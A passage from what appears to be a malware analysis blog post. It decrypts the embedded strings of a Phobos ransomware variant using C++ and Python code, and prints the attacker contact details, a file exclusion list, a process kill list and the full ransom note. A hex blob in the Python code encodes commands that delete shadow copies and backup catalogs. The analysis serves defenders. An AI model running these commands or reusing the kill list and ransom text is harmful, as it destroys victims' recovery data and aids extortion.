58, 34, 105, 201, 25, 244, 120, 4, 116, 206, 157, 187, 151, 223, 110, 89, 228, 164, 230, 242, 54, 42, 62, 88, 92, 52, 139, 231, 132, 90, 162, 105, 119, 182, 199, 1, 200, 73, 190, 158, 110, 120, 92, 204, 174, 209, 61, 211, 252, 194, 54, 143, 209, 
28, 26, 214, 184, 249, 10, 2, 41, 161, 77, 203, 181, 237, 4, 70, 165, 181, 68, 129, 60, 167, 39, 102, 100, 146, 88, 64, 36, 243, 148, 244, 246, 50, 87, 169, 83, 191, 189, 242, 235, 133, 237, 10, 46, 58, 42, 204, 53, 243, 222, 251, 14, 182, 137, 156, 25, 197, 25, 237, 138, 188, 8, 222, 56, 8, 25, 227, 188, 108, 97, 254, 63, 131, 144, 155, 94, 120, 29, 134, 234, 61, 156, 216, 207, 13, 7, 109, 22, 189, 137, 79, 52, 133, 144, 48, 21, 10, 229, 56, 77, 1, 199, 0, 43, 235, 177, 201, 62, 120, 201, 7, 68, 144, 205, 17, 100, 244, 196, 92, 191, 91, 13, 224, 97, 146, 123, 251, 6, 254, 118, 190, 69, 147, 166, 245, 47, 251, 83, 240, 201, 93, 42, 176, 122, 55, 218, 51, 238, 171, 193, 216, 235, 128, 80, 203, 16, 177, 209, 103, 174, 115, 4, 45, 92, 159, 48, 54, 112, 216, 119, 218, 209, 212, 84, 12, 78, 99, 44, 0, 36, 228, 180, 81, 118, 50, 181, 179, 209, 14, 158, 155, 238, 153, 2, 137, 216, 80, 255, 251, 231, 214, 12, 11, 59, 51, 164, 238, 20, 90, 9, 203, 200, 202, 105, 233, 82, 145, 17, 9, 187, 168, 3, 134, 21, 118, 66, 1, 174, 35, 205, 216, 47, 135, 60, 220, 6, 46, 21, 245, 77, 32, 110, 26, 161, 0, 129, 100, 251, 190, 193, 5, 14, 55, 203, 24, 232, 238, 124, 36, 55, 51, 72, 129, 198, 63, 78, 207, 46, 254, 87, 154, 176, 188, 131, 13, 186, 22, 68, 43, 14, 148, 173, 161, 126, 244, 135, 137, 58, 133, 63, 25, 194, 172, 4, 79, 149, 204, 37, 216, 1, 184, 213, 139, 135, 16, 58, 181, 44, 88, 225, 55, 219, 6, 51, 83, 230, 198, 227, 106, 196, 137, 208, 223, 74, 56, 182, 109, 49, 200, 211, 72, 70, 226, 25, 171, 187, 67, 138, 88, 103, 19, 202, 112, 9, 129, 141, 244, 122, 55, 238, 26, 131, 231, 197, 68, 203, 146, 207, 198, 104, 184, 190, 43, 201, 143, 130, 110, 156, 88, 167, 57, 61, 72, 171, 25, 85, 224, 158, 73, 70, 158, 90, 8, 165, 221, 61, 217, 236, 29, 122, 31, 220, 237, 195, 255, 229, 237, 248, 140, 130, 62, 111, 235, 193, 224, 34, 127, 66, 65, 13, 222, 140, 79, 253, 54, 170, 195, 88, 133, 19, 204, 201, 114, 113, 46, 194, 194, 2, 234, 22, 246, 142, 50, 114, 206, 189, 55, 117, 85, 220, 167, 
238, 172, 65, 85, 20, 169, 56, 183, 200, 234, 105, 156, 113, 111, 124, 254, 20, 207, 138, 175, 188, 85, 109, 158, 108, 120, 88, 120, 24, 72, 193, 84, 187, 130, 161, 61, 225, 113, 58, 175, 36, 50, 116, 160, 208, 231, 163, 56, 78, 124, 168, 175, 160, 221, 11, 179, 255, 32, 59, 120, 41, 141, 67, 25, 228, 197, 152, 183, 39, 8, 129},
        {121, 163, 126, 166, 70, 82, 158, 135, 231, 117, 72, 245, 55, 234, 142, 143, 2, 40, 48, 40, 57, 172, 175, 172, 7, 184, 225, 69, 64, 150, 31, 212, 180, 187, 222, 34, 208, 15, 134, 112, 103, 193, 234, 224, 177, 45, 244, 246, 184, 245, 154, 130, 36, 19, 108, 215, 66, 194, 8, 2, 60, 163, 217, 101, 94, 225, 91, 143, 100, 7, 136, 77, 166, 176, 226, 152, 61, 218, 59, 18, 209, 27, 234, 13, 211, 193, 98, 192, 204, 195, 70, 129, 102, 215, 134, 70},
        {17, 230, 101, 210, 113, 81, 131, 18, 131, 76, 160, 127, 178, 8, 228, 169, 109, 213, 120, 188, 172, 61, 157, 142, 245, 10, 169, 217, 135, 221, 98, 71, 192, 162, 197, 171, 153, 229, 87, 154, 157, 9, 49, 53, 198, 142, 42, 150, 46, 171, 151, 246, 251, 72, 69, 91, 98, 190, 190, 29, 225, 114, 207, 2, 111, 116, 139, 214, 219, 93, 20, 171, 192, 102, 177, 92, 87, 204, 30, 196, 105, 42, 62, 34, 15, 230, 237, 144, 194, 205, 87, 139, 144, 162, 234, 166, 155, 250, 122, 236, 242, 205, 222, 112, 197, 39, 185, 95, 210, 49, 86, 187, 222, 220, 53, 209, 105, 226, 150, 166, 249, 133, 48, 64, 53, 101, 32, 81, 204, 174, 240, 214, 62, 124, 156, 17, 122, 248, 199, 179, 183, 80, 248, 253, 95, 90, 94, 97, 61, 72, 80, 208, 84, 99, 34, 137, 246, 194, 243, 10},
        {206, 63, 216, 111, 119, 204, 152, 113, 39, 8, 244, 241, 236, 127, 109, 73, 242, 80, 165, 14, 114, 115, 170, 141, 101, 46, 111, 228, 3, 67, 110, 41},
        {186, 39, 85, 26, 162, 180, 200, 41, 194, 73, 68, 78, 46, 31, 32, 244, 0, 197, 44, 198, 0, 218, 178, 215, 195, 128, 3, 13, 60, 231, 249, 151},
        {226, 207, 218, 140, 254, 136, 157, 24, 120, 1, 6, 109, 179, 102, 183, 222, 89, 128, 10, 59, 149, 163, 194, 87, 80, 208, 106, 224, 120, 162, 95, 243},
        {246, 240, 58, 163, 220, 47, 102, 221, 14, 218, 96, 153, 104, 232, 240, 162, 226, 79, 17, 97, 82, 205, 34, 128, 153, 211, 191, 126, 171, 185, 9, 19, 28, 238, 251, 234, 140, 160, 110, 143, 181, 247, 238, 106, 227, 172, 161, 175, 223, 205, 79, 119, 12, 160, 168, 78, 126, 157, 157, 169, 232, 39, 138, 3},
        {128, 249, 56, 168, 34, 114, 54, 29, 101, 211, 151, 85, 155, 216, 172, 130, 25, 17, 159, 232, 55, 112, 206, 191, 74, 109, 135, 181, 250, 83, 198, 251},
        {22, 239, 8, 42, 56, 14, 157, 119, 250, 135, 19, 247, 13, 34, 61, 233, 255, 113, 232, 70, 140, 59, 248, 108, 97, 13, 98, 182, 101, 144, 177, 21},
        {99, 214, 157, 24, 52, 212, 41, 114, 163, 134, 136, 247, 32, 100, 52, 221, 98, 185, 59, 233, 232, 21, 173, 138, 180, 239, 37, 98, 61, 142, 192, 140, 152, 53, 102, 235, 103, 184, 206, 48, 234, 147, 155, 161, 63, 45, 212, 190, 153, 246, 142, 40, 225, 219, 0, 197, 249, 143, 231, 14, 243, 3, 193, 103},
        {100, 9, 42, 43, 130, 195, 221, 105, 61, 54, 142, 207, 63, 202, 227, 116, 129, 99, 53, 103, 33, 75, 253, 75, 73, 217, 24, 126, 198, 228, 226, 229}, 
        {6, 184, 47, 43, 226, 131, 113, 149, 211, 215, 155, 126, 201, 192, 218, 190, 109, 212, 33, 204, 134, 254, 158, 218, 179, 234, 218, 73, 77, 83, 223, 230},
        {174, 147, 21, 204, 35, 237, 105, 225, 217, 125, 155, 197, 82, 27, 87, 9, 142, 51, 71, 45, 79, 115, 96, 219, 205, 162, 253, 115, 79, 24, 41, 183},
        {244, 166, 215, 221, 36, 150, 206, 41, 82, 194, 96, 97, 57, 72, 245, 188, 47, 142, 128, 64, 143, 10, 69, 197, 221, 176, 56, 81, 216, 220, 188, 47},
        {36, 37, 125, 116, 74, 204, 118, 25, 189, 194, 54, 192, 90, 116, 143, 195, 140, 10, 66, 229, 55, 142, 72, 35, 139, 185, 88, 160, 225, 53, 152, 216, 203, 222, 69, 157, 98, 19, 182, 247, 40, 83, 64, 176, 214, 0, 144, 14, 198, 44, 109, 202, 11, 25, 5, 55, 180, 24, 86, 17, 56, 182, 96, 49, 120, 246, 254, 207, 173, 164, 111, 20, 170, 193, 53, 91, 35, 65, 65, 253, 73, 55, 216, 227, 111, 3, 247, 115, 52, 89, 122, 159, 69, 144, 27, 103},
        {28, 226, 151, 180, 52, 101, 230, 26, 183, 120, 151, 249, 251, 91, 21, 180, 178, 183, 238, 91, 183, 106, 2, 96, 161, 169, 73, 187, 246, 40, 116, 101, 189, 208, 73, 250, 171, 146, 149, 82, 183, 47, 136, 10, 86, 252, 214, 10, 111, 18, 66, 130, 55, 233, 48, 92, 76, 67, 217, 28, 232, 102, 198, 106, 214, 211, 78, 41, 49, 238, 95, 164, 20, 218, 84, 40, 167, 137, 19, 242, 100, 191, 215, 15, 4, 108, 12, 134, 89, 241, 90, 248, 77, 223, 112, 245, 214, 81, 42, 61, 232, 20, 98, 121, 91, 143, 240, 206, 96, 11, 10, 251, 87, 137, 247, 128, 45, 7, 38, 244, 232, 155, 6, 48, 89, 232, 54, 125},
        {7, 78, 82, 40, 205, 120, 104, 239, 180, 179, 224, 107, 90, 72, 234, 188, 177, 199, 96, 148, 186, 132, 142, 190, 103, 2, 73, 160, 233, 198, 106, 142},
        {123, 199, 186, 153, 219, 54, 0, 16, 231, 44, 71, 12, 205, 66, 82, 13, 66, 160, 88, 236, 154, 60, 171, 105, 171, 227, 9, 41, 57, 94, 32, 123},
        {91, 92, 65, 75, 10, 153, 168, 126, 207, 108, 122, 152, 185, 100, 107, 73, 85, 126, 249, 2, 102, 216, 32, 48, 173, 163, 221, 126, 46, 169, 175, 191},
        {73, 154, 60, 102, 80, 39, 20, 37, 16, 1, 171, 207, 96, 82, 123, 165, 31, 27, 205, 126, 55, 247, 180, 1, 119, 49, 212, 121, 203, 181, 25, 184}, 
        {106, 148, 67, 49, 8, 181, 99, 70, 221, 173, 244, 91, 148, 57, 27, 208, 124, 180, 8, 150, 27, 183, 87, 60, 10, 20, 120, 241, 213, 25, 252, 88},
        {176, 172, 163, 118, 20, 201, 255, 181, 205, 48, 93, 75, 17, 3, 11, 18, 76, 166, 237, 124, 79, 119, 85, 243, 23, 87, 178, 9, 237, 65, 70, 232, 251, 101, 9, 54, 55, 123, 179, 7, 234, 130, 170, 101, 169, 22, 252, 74, 233, 49, 101, 237, 235, 3, 26, 187, 108, 179, 199, 96, 150, 37, 104, 125},
        {78, 62, 210, 220, 177, 142, 250, 52, 52, 58, 113, 142, 154, 170, 129, 120, 70, 34, 254, 202, 87, 106, 6, 137, 118, 64, 210, 201, 223, 166, 141, 44, 54, 81, 55, 190, 223, 147, 109, 134, 195, 157, 14, 222, 215, 117, 53, 85, 67, 203, 200, 162, 236, 217, 163, 216, 243, 6, 7, 34, 251, 29, 141, 238, 39, 42, 20, 146, 58, 254, 64, 191, 5, 240, 182, 63, 80, 33, 254, 71, 232, 87, 76, 149, 45, 178, 232, 116, 101, 38, 124, 36, 135, 92, 117, 82, 128, 42, 34, 199, 9, 1, 139, 174, 98, 140, 6, 176, 52, 107, 9, 26, 77, 7, 125, 204, 47, 32, 126, 131, 121, 24, 234, 29, 247, 82, 184, 3}, {170, 163, 0, 183, 231, 51, 142, 209, 196, 158, 219, 242, 62, 162, 33, 164, 63, 24, 49, 252, 95, 194, 250, 10, 115, 157, 153, 19, 18, 240, 195, 196, 178, 24, 100, 174, 111, 217, 164, 210, 65, 129, 26, 38, 67, 96, 133, 166, 246, 58, 46, 252, 232, 186, 151, 165, 107, 168, 181, 118, 26, 43, 182, 156, 129, 90, 92, 108, 73, 233, 180, 118, 255, 197, 32, 98, 167, 93, 69, 187, 34, 146, 161, 43, 249, 186, 202, 174, 38, 150, 183, 70, 226, 217, 248, 128, 66, 142, 106, 66, 56, 156, 207, 58, 253, 113, 220, 193, 92, 185, 32, 146, 48, 39, 94, 35, 66, 157, 6, 216, 37, 150, 236, 152, 104, 217, 249, 249},
        {246, 90, 179, 234, 48, 142, 1, 26, 36, 136, 217, 47, 237, 39, 148, 183, 90, 52, 241, 83, 206, 43, 5, 13, 203, 219, 225, 101, 6, 190, 3, 70, 84, 81, 155, 234, 52, 88, 75, 21, 60, 165, 20, 36, 118, 21, 128, 11, 126, 233, 21, 107, 160, 49, 220, 133, 107, 16, 147, 19, 163, 9, 158, 246, 46, 40, 42, 123, 63, 57, 219, 105, 105, 92, 145, 51, 2, 188, 172, 174, 31, 181, 110, 138, 233, 29, 63, 169, 66, 180, 179, 227, 49, 90, 49, 115},
        {172, 40, 133, 17, 93, 47, 207, 47, 88, 33, 169, 159, 208, 62, 66, 62, 138, 133, 43, 164, 180, 21, 35, 65, 138, 194, 105, 63, 72, 27, 215, 62, 187, 171, 29, 51, 48, 168, 242, 106, 199, 183, 238, 170, 45, 180, 253, 252, 200, 62, 150, 176, 114, 101, 182, 251, 190, 225, 197, 194, 102, 124, 222, 229, 165, 1, 90, 252, 242, 189, 16, 147, 114, 225, 110, 170, 27, 76, 242, 52, 201, 124, 37, 0, 132, 200, 62, 116, 26, 164, 143, 155, 23, 73, 214, 204, 33, 242, 15, 0, 220, 65, 0, 11, 96, 186, 104, 76, 229, 33, 215, 236, 190, 198, 62, 242, 187, 204, 202, 86, 32, 23, 206, 210, 107, 27, 174, 164, 116, 28, 92, 74, 132, 63, 235, 127, 236, 192, 119, 239, 162, 43, 6, 227, 79, 229, 162, 227, 200, 226, 91, 25, 41, 201, 4, 132, 144, 47, 47, 13},
        {11, 196, 195, 32, 5, 100, 134, 104, 84, 247, 183, 154, 223, 203, 231, 212, 249, 49, 234, 142, 101, 230, 90, 161, 74, 23, 113, 45, 103, 154, 194, 223},
        {225, 27, 175, 232, 18, 37, 161, 122, 76, 83, 88, 208, 28, 104, 151, 150, 163, 88, 178, 12, 210, 196, 186, 7, 100, 84, 199, 125, 35, 111, 137, 22},
        {99, 192, 5, 231, 196, 191, 149, 122, 168, 127, 92, 174, 236, 236, 214, 170, 99, 242, 62, 64, 27, 193, 183, 109, 195, 35, 151, 195, 241, 61, 229, 139},
        {220, 25, 66, 162, 171, 84, 248, 250, 166, 89, 113, 126, 137, 254, 36, 236, 12, 162, 255, 132, 147, 174, 234, 208, 85, 214, 140, 58, 18, 110, 38, 19},
        {225, 122, 168, 104, 101, 254, 28, 98, 196, 73, 255, 234, 209, 50, 85, 59, 215, 4, 226, 206, 4, 104, 132, 56, 18, 67, 88, 151, 197, 2, 113, 127, 69, 221, 16, 243, 76, 58, 31, 9, 95, 116, 231, 41, 124, 176, 43, 219, 80, 250, 227, 102, 37, 99, 70, 154, 210, 218, 203, 39, 185, 172, 105, 226, 61, 186, 80, 177, 99, 220, 135, 98, 81, 16, 9, 92, 31, 164, 131, 178, 171, 9, 183, 126, 180, 152, 146, 86, 97, 108, 146, 58, 5, 97, 94, 71, 250, 186, 95, 57, 197, 129, 20, 161, 241, 231, 58, 137, 100, 166, 203, 100, 219, 53, 174, 245, 209, 156, 214, 41, 79, 235, 133, 119, 11, 253, 45, 195},
        {63, 1, 129, 0, 184, 38, 2, 45, 48, 182, 29, 246, 225, 57, 153, 32, 252, 56, 102, 191, 106, 27, 20, 53, 211, 92, 58, 203, 65, 57, 143, 240},
        {71, 167, 222, 114, 175, 188, 242, 180, 12, 127, 185, 48, 145, 172, 16, 227, 102, 70, 142, 174, 3, 180, 205, 4, 190, 126, 219, 132, 156, 135, 215, 63, 162, 33, 205, 197, 253, 115, 81, 242, 236, 110, 69, 130, 119, 169, 19, 213, 221, 23, 80, 9, 244, 210, 120, 198, 148, 249, 103, 32, 23, 37, 191, 165, 141, 250, 145, 222, 137, 45, 185, 181, 239, 28, 33, 73, 121, 36, 92, 88, 37, 59, 76, 103, 69, 55, 3, 44, 90, 106, 171, 241, 177, 20, 39, 193},
        {71, 222, 90, 85, 178, 32, 186, 251, 190, 85, 181, 183, 104, 108, 40, 65, 9, 60, 190, 160, 123, 93, 92, 3, 123, 136, 133, 229, 80, 51, 62, 238},
        {236, 8, 245, 211, 134, 204, 47, 173, 97, 61, 239, 77, 34, 14, 198, 120, 44, 109, 241, 215, 133, 77, 145, 142, 6, 168, 90, 21, 254, 249, 26, 218},
        {59, 87, 121, 19, 80, 78, 243, 5, 97, 202, 60, 179, 250, 199, 105, 178, 26, 149, 210, 101, 6, 161, 215, 103, 120, 178, 93, 99, 209, 150, 136, 181, 19, 242, 57, 147, 253, 219, 122, 48, 59, 111, 51, 2, 131, 25, 90, 221, 111, 228, 223, 145, 201, 41, 34, 169, 39, 109, 145, 177, 129, 157, 11, 57, 174, 161, 95, 41, 6, 105, 156, 0, 29, 96, 194, 19, 20, 133, 81, 240, 186, 84, 155, 76, 84, 15, 226, 230, 151, 252, 96, 176, 156, 202, 74, 193, 228, 6, 61, 205, 55, 15, 199, 68, 227, 218, 250, 7, 139, 43, 159, 42, 239, 54, 176, 28, 102, 27, 206, 71, 204, 171, 71, 249, 254, 51, 52, 178, 173, 226, 162, 107, 80, 186, 148, 255, 43, 144, 102, 168, 28, 153, 205, 204, 117, 93, 42, 228, 229, 147, 173, 67, 82, 33, 124, 67, 25, 177, 110, 209, 20, 90, 128, 2, 103, 133, 187, 109, 240, 154, 49, 65, 213, 38, 150, 74, 240, 209, 21, 167, 89, 72, 177, 179, 135, 111, 54, 145, 71, 70, 94, 119},
        {91, 47, 23, 232, 198, 63, 14, 123, 10, 15, 137, 32, 228, 93, 19, 41, 157, 82, 6, 83, 50, 236, 50, 57, 149, 66, 140, 61, 76, 155, 176, 70, 93, 84, 127, 86, 142, 185, 211, 80, 34, 97, 95, 238, 38, 223, 43, 52, 27, 235, 20, 42, 116, 51, 52, 165, 98, 254, 148, 221, 125, 233, 64, 164, 154, 182, 24, 104, 74, 145, 234, 27, 239, 233, 45, 188, 118, 23, 251, 127, 57, 233, 46, 180, 212, 197, 177, 74, 201, 132, 230, 34, 9, 28, 2, 234},
        {82, 95, 95, 51, 123, 134, 16, 124, 201, 95, 89, 140, 151, 210, 135, 22, 9, 120, 72, 172, 144, 146, 118, 135, 251, 84, 81, 164, 2, 201, 90, 66, 219, 55, 201, 185, 209, 227, 138, 167, 128, 215, 59, 170, 115, 144, 227, 74, 207, 142, 89, 180, 233, 20, 11, 202, 12, 33, 100, 0, 182, 189, 235, 0}
    };

    for (size_t i = 0; i < cipher_list.size(); i++)
    {
        // The key is re-imported for every blob: CryptDecrypt is called with
        // Final = FALSE so the zero padding survives, which also means the
        // cipher's chaining state would otherwise carry over into the next blob.
        if (!CryptImportKey(hProv, (BYTE*)&keyBlob, sizeof(keyBlob), 0, 0, &hKey)) {
            std::cerr << "CryptImportKey failed: " << GetLastError() << std::endl;
            if (hProv) CryptReleaseContext(hProv, 0);
            return 1;
        }
        // In-place decryption: dataLen is the ciphertext length on input and
        // the plaintext length on output.
        DWORD dataLen = (DWORD)cipher_list[i].size();
        if (!CryptDecrypt(hKey, 0, FALSE, 0, cipher_list[i].data(), &dataLen)) {
            std::cerr << "CryptDecrypt failed: " << GetLastError() << std::endl;
            CryptDestroyKey(hKey);
            CryptReleaseContext(hProv, 0);
            return 1;
        }
        cipher_list[i].resize(dataLen);
        std::cout << "Sign: " << sign_list[i] << std::endl;
        //std::cout << "Plaintext: " << cipher_list[i].data() << std::endl;
        std::cout << "Data ";
        PrintHex(cipher_list[i]);
        std::cout << "------------------------------" << std::endl;
        // Release this iteration's key handle; the next iteration imports a fresh one.
        CryptDestroyKey(hKey);
    }
    CryptReleaseContext(hProv, 0);
    return 0;
}
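The loop above only dumps each decrypted blob as hex, and the Python pass that turns those dumps into the readable flag table below is not included in the post. The following is an added example (my code, not the post author's) that does that post-processing for a few of the blobs copied from the table: it strips the zero padding, tells the UTF-16LE strings from the ASCII shadow-copy script, and parses flag 0xa as a CryptoAPI RSA PUBLICKEYBLOB to recover the 1024-bit modulus and public exponent; the blob dictionary, the `classify` heuristic and all function names are mine.

```python
"""Post-process decrypted Phobos .SRC string blobs by flag (added example)."""
import struct

# Blob bytes copied from the "解密HEX" rows of the table below, keyed by the
# flag ("Sign") the decryptor prints. Trailing zero padding is written as
# "00" * n. Flags: 0x0/0x1/0x6 UTF-16LE strings, 0x9 the ASCII command
# script, 0xa the RSA public key blob, 0xe an opaque value.
DECRYPTED = {
    0x0: bytes.fromhex("530052004300" + "00" * 26),
    0x1: bytes.fromhex("630068006500770062006100630063006100400063006f00"
                       "63006b002e006c006900" + "00" * 30),
    0x6: bytes.fromhex("2b0052004500410044004d0045002d005700410052004e00"
                       "49004e0047002b002e00740078007400" + "00" * 24),
    0x9: bytes.fromhex("76737361646d696e2064656c65746520736861646f7773202f616c6c"
                       "202f71756965740a776261646d696e2064656c65746520636174616c"
                       "6f67202d71756965740a776d696320736861646f77636f7079206465"
                       "6c6574650a657869740a0000"),
    0xa: bytes.fromhex("0602000000a40000" "52534131" "00040000" "01000100"
                       "1d35622bcfbcfe4fde59eae15c05d7528d0c1ae6755c1809"
                       "04dd745cd1f5a19986fce1e0e9534595e4fb7bdd6d5cc1f2"
                       "cee684851bfc59529108c433185cf76c800f421aad345aa6"
                       "a964e8f485acf1d3965c85654b124257e0142269eab809af"
                       "68692309843ce7cd4fa8bf3124926f0403a7502abbecfa2b"
                       "a7504e63a958e7bd" + "00" * 12),
    0xe: bytes.fromhex("00000400" + "00" * 28),
}


def _body(blob: bytes) -> bytes:
    """Drop the zero padding the decryptor leaves after the real content."""
    return blob.rstrip(b"\x00")


def _is_text(s: str) -> bool:
    return bool(s) and all(c.isprintable() or c in "\r\n\t" for c in s)


def parse_publickeyblob(blob: bytes) -> dict:
    """Parse a CryptoAPI PUBLICKEYBLOB: BLOBHEADER (bType, bVersion, reserved,
    aiKeyAlg) + RSAPUBKEY (magic "RSA1", bitlen, pubexp) + little-endian modulus."""
    b_type, b_version, _reserved, alg = struct.unpack_from("<BBHI", blob, 0)
    magic, bitlen, pubexp = struct.unpack_from("<4sII", blob, 8)
    if b_type != 0x06 or magic != b"RSA1":
        raise ValueError("not an RSA PUBLICKEYBLOB")
    n = int.from_bytes(blob[20:20 + bitlen // 8], "little")
    return {"version": b_version, "alg": alg, "bits": bitlen, "e": pubexp, "n": n}


def classify(blob: bytes):
    """Return (kind, value) with kind in rsa_pubkey / utf16 / ascii / raw."""
    if blob[:1] == b"\x06" and blob[8:12] == b"RSA1":
        return "rsa_pubkey", parse_publickeyblob(blob)
    body = _body(blob)
    # rstrip also eats the high byte of the last UTF-16 code unit; restore it.
    wide = body + b"\x00" if len(body) % 2 else body
    if wide and all(b == 0 for b in wide[1::2]):
        text = wide.decode("utf-16-le")
        if _is_text(text):
            return "utf16", text
    try:
        text = body.decode("ascii")
        if _is_text(text):
            return "ascii", text
    except UnicodeDecodeError:
        pass
    return "raw", body.hex()


def decode_table(blobs: dict) -> dict:
    """Map every flag to its classified, human-readable value."""
    return {flag: classify(blob) for flag, blob in blobs.items()}


if __name__ == "__main__":
    for flag, (kind, value) in sorted(decode_table(DECRYPTED).items()):
        print(f"0x{flag:x} [{kind}]: {value}")
```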

The output produced here is still not very readable, so I ran it through Python once more; the results are below. From here on, the flag can be used as the key to look each entry up in this table and quickly find the decrypted string.

Decrypted strings
标志:  0x0
解密字符串:SRC
解密HEX: 5300520043000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x1
解密字符串:chewbacca@cock.li
解密HEX: 630068006500770062006100630063006100400063006f0063006b002e006c006900000000000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x4
解密字符串:boot.ini;bootfont.bin;ntldr;ntdetect.com;io.sys;+README-WARNING+.txt;desktop.ini;
解密HEX: 62006f006f0074002e0069006e0069003b0062006f006f00740066006f006e0074002e00620069006e003b006e0074006c00640072003b006e0074006400650074006500630074002e0063006f006d003b0069006f002e007300790073003b002b0052004500410044004d0045002d005700410052004e0049004e0047002b002e007400780074003b006400650073006b0074006f0070002e0069006e0069003b00000000000000000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x5
解密字符串:sqlbrowser.exe;sqlwriter.exe;sqlservr.exe;msmdsrv.exe;MsDtsSrvr.exe;sqlceip.exe;fdlauncher.exe;Ssms.exe;sqlagent.exe;fdhost.exe;ReportingServicesService.exe;msftesql.exe;pg_ctl.exe;postgres.exe;UniFi.exe;armsvc.exe;IntelCpHDCPSvc.exe;OfficeClickToRun.exe;DellOSDService.exe;DymoPnpService.exe;Agent.exe;FJTWMKSV.exe;IPROSetMonitor.exe;IRMTService.exe;MBCloudEA.exe;QBCFMonitorService.exe;QBIDPService.exe;RstMwService.exe;TeamViewer_Service.exe;dasHost.exe;IntelCpHeciSvc.exe;RAVBg64.exe;vds.exe;unsecapp.exe;TodoBackupService.exe;MediaButtons.exe;IAStorDataMgrSvc.exe;jhi_service.exe;LMS.exe;DDVDataCollector.exe;DDVCollectorSvcApi.exe;TeamViewer.exe;tv_w32.exe;tv_x64.exe;Microsoft.Photos.exe;MicrosoftEdge.exe;ApplicationFrameHost.exe;browser_broker.exe;MicrosoftEdgeSH.exe;MicrosoftEdgeCP.exe;RtkNGUI64.exe;WavesSvc64.exe;OneDrive.exe;DYMO.DLS.Printing.Host.exe;FtLnSOP.exe;FjtwMkup.exe;FTPWREVT.exe;FTErGuid.exe;qbupdate.exe;QBWebConnector.exe;ShellExperienceHost.exe;RuntimeBroker.exe;IAStorIcon.exe;PrivacyIconClient.exe;SupportAssistAgent.exe;SecurityHealthService.exe;taskhostw.exe;taskhosta.exe;wijca.exe;ktfwswe.exe;HeciServer.exe;mdm.exe;ULCDRSvr.exe;WLIDSVC.EXE;WLIDSVCM.EXE;GoogleCrashHandler.exe;GoogleCrashHandler64.exe;RAVCpl64.exe;igfxtray.exe;hkcmd.exe;igfxpers.exe;PsiService_2.exe;UNS.exe;taskeng.exe;AdobeARM.exe;LenovoReg.exe;dwm.exe;wuauclt.exe;avp.exe;FBService.exe;LBAEvent.exe;PDFProFiltSrvPP.exe;avpsus.exe;klnagent.exe;vapm.exe;ScanToPCActivationApp.exe;BrStMonW.exe;BrCtrlCntr.exe;concentr.exe;redirector.exe;BrccMCtl.exe;BrYNSvc.exe;Receiver.exe;BrCcUxSys.exe;LSCNotify.exe;SelfServicePlugin.exe;wfcrun32.exe;HPNETW~1.EXE;HPScan.exe;taskhost.exe;Teams.exe;AuthManSvr.exe;WLXPhotoGallery.exe;outlook.exe;prevhost.exe;excel.exe;chrome.exe;AcroRd32.exe;RdrCEF.exe;vssadmin.exe;WmiPrvSE.exe;oracle.exe;ocssd.exe;dbsnmp.exe;synctime.exe;agntsrvc.exe;mydesktopqos.exe;isqlplussvc.exe;xfssvccon.exe;mydesktopservice.exe;ocautoupds.exe;encsvc.exe;firefoxconfig.exe;tbirdconfig.exe;ocomm.exe;mysqld.exe;mysqld-nt.exe;mysqld-opt.exe;dbeng50.exe;sqbcoreservice.exe;infopath.exe;msaccess.exe;mspub.exe;onenote.exe;powerpnt.exe;steam.exe;thebat.exe;thebat64.exe;thunderbird.exe;visio.exe;winword.exe;wordpad.exe;
解密HEX: 
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x6
解密字符串:+README-WARNING+.txt
解密HEX: 2b0052004500410044004d0045002d005700410052004e0049004e0047002b002e00740078007400000000000000000000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x7
解密字符串:YOUR_FILES_ARE_ENCRYPTED
解密HEX: 59004f00550052005f00460049004c00450053005f004100520045005f0045004e00430052005900500054004500440000000000000000000000000000000000
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
标志:  0x8
解密字符串:::: Greetings :::

Little FAQ:

.1. 
Q: Whats Happen?
A: Your files have been encrypted. The file structure was not damaged, we did everything possible so that this could not happen.

.2. 
Q: How to recover files?
A: If you wish to decrypt your files you will need to pay us.

.3. 
Q: What about guarantees?
A: Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will cooperate with us. Its not in our interests.
To check the ability of returning files, you can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!) and low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.

.4.
Q: How to contact with you?
A: You can write us to our mailbox: chewbacca@cock.li
Or you can contact us via TOX: ADA6E26332F26451E45768179C771CA87A7F0F4E234DA8D882888F505494925DCF274A3EA555
You don't know about TOX? Go to https://tox.chat

.5.
Q: How will the decryption process proceed after payment?
A: After payment we will send to you our scanner-decoder program and detailed instructions for use. With this program you will be able to decrypt all your encrypted files.

.6.
Q: If I don t want to pay bad people like you?
A: If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause only we have the private key. In practice - time is much more valuable than money.

:::BEWARE:::
DON'T try to change encrypted files by yourself! 
If you will try to use any third party software for restoring your data or antivirus solutions - please make a backup for all encrypted files!
Any changes in encrypted files may entail damage of the private key and, as result, the loss all data.

解密HEX: 3a3a3a204772656574696e6773203a3a3a0d0a0d0a4c6974746c65204641513a0d0a0d0a2e312e200d0a513a2057686174732048617070656e3f0d0a413a20596f75722066696c65732068617665206265656e20656e637279707465642e205468652066696c652073747275637475726520776173206e6f742064616d616765642c207765206469642065766572797468696e6720706f737369626c6520736f2074686174207468697320636f756c64206e6f742068617070656e2e0d0a0d0a2e322e200d0a513a20486f7720746f207265636f7665722066696c65733f0d0a413a20496620796f75207769736820746f206465637279707420796f75722066696c657320796f752077696c6c206e65656420746f207061792075732e0d0a0d0a2e332e200d0a513a20576861742061626f75742067756172616e746565733f0d0a413a20497473206a757374206120627573696e6573732e205765206162736f6c7574656c7920646f206e6f7420636172652061626f757420796f7520616e6420796f7572206465616c732c206578636570742067657474696e672062656e65666974732e20496620776520646f206e6f7420646f206f757220776f726b20616e64206c696162696c6974696573202d206e6f626f64792077696c6c20636f6f70657261746520776974682075732e20497473206e6f7420696e206f757220696e746572657374732e0d0a546f20636865636b